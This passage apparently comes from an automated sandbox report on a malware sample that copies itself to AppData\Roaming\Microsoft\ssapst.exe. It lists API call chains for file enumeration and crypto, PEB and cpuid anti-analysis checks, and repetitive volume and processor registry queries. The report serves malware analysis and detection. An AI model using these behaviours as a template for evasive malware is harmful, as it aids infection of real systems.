Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Code function: 4_2_0FE66BA0 lstrlenW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcatW,lstrlenW,lstrcmpW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,lstrlenA,VirtualFree,CloseHandle,lstrcmpW,FindNextFileW,FindClose,	4_2_0FE66BA0

Source: C:\Users\user\Desktop\wThN5MTIsw.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\wThN5MTIsw.exe	API call chain: ExitProcess graph end node	graph_0-1755
Source: C:\Users\user\Desktop\wThN5MTIsw.exe	API call chain: ExitProcess graph end node	graph_0-1973
Source: C:\Users\user\Desktop\wThN5MTIsw.exe	API call chain: ExitProcess graph end node	graph_0-1770
Source: C:\Users\user\Desktop\wThN5MTIsw.exe	API call chain: ExitProcess graph end node	graph_0-1778
Source: C:\Users\user\Desktop\wThN5MTIsw.exe	API call chain: ExitProcess graph end node	graph_0-1906
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	API call chain: ExitProcess graph end node	graph_2-1760
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	API call chain: ExitProcess graph end node	graph_2-1773
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	API call chain: ExitProcess graph end node	graph_2-1976
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	API call chain: ExitProcess graph end node	graph_2-1782
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	API call chain: ExitProcess graph end node	graph_2-1910
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	API call chain: ExitProcess graph end node	graph_4-1761
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	API call chain: ExitProcess graph end node	graph_4-1977
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	API call chain: ExitProcess graph end node	graph_4-1783
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	API call chain: ExitProcess graph end node	graph_4-1774
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	API call chain: ExitProcess graph end node	graph_4-1911

Source: wThN5MTIsw.exe, 00000000.00000002.335452470.00000000008D9000.00000004.00000020.00020000.00000000.sdmp, ssapst.exe, 00000002.00000002.369878312.0000000000DCA000.00000004.00000020.00020000.00000000.sdmp, ssapst.exe, 00000004.00000002.382761696.0000000001018000.00000004.00000020.00020000.00000000.sdmp, ssapst.exe, 00000013.00000002.553629451.0000000000C6B000.00000004.00000020.00020000.00000000.sdmp, ssapst.exe, 00000018.00000002.585108554.00000000012E8000.00000004.00000020.00020000.00000000.sdmp, ssapst.exe, 00000019.00000002.605561331.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\wThN5MTIsw.exe

Code function: 0_2_0F4E8400 VirtualAlloc,CryptAcquireContextW,VirtualAlloc,GetModuleHandleA,LoadLibraryA,GetProcAddress,CryptReleaseContext,VirtualFree,CryptReleaseContext,VirtualFree,

0_2_0F4E8400

Source: C:\Users\user\Desktop\wThN5MTIsw.exe

Code function: 0_2_0F4E3200 lstrlenA,GetProcessHeap,HeapAlloc,lstrlenA,GetProcessHeap,HeapAlloc,lstrcpyA,

0_2_0F4E3200

Source: C:\Users\user\Desktop\wThN5MTIsw.exe	Code function: 0_2_0F4E5FF0 mov eax, dword ptr fs:[00000030h]	0_2_0F4E5FF0
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Code function: 2_2_0FE65FF0 mov eax, dword ptr fs:[00000030h]	2_2_0FE65FF0
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Code function: 4_2_0FE65FF0 mov eax, dword ptr fs:[00000030h]	4_2_0FE65FF0

Source: C:\Users\user\Desktop\wThN5MTIsw.exe

Code function: 0_2_0F4E3C70 AllocateAndInitializeSid,GetModuleHandleA,GetProcAddress,FreeSid,

0_2_0F4E3C70

Source: C:\Users\user\Desktop\wThN5MTIsw.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wThN5MTIsw.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\wThN5MTIsw.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\wThN5MTIsw.exe

Code function: 0_2_0F4E9200 cpuid

0_2_0F4E9200

Source: C:\Users\user\Desktop\wThN5MTIsw.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\Desktop\wThN5MTIsw.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\Desktop\wThN5MTIsw.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\Desktop\wThN5MTIsw.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\Desktop\wThN5MTIsw.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\Desktop\wThN5MTIsw.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
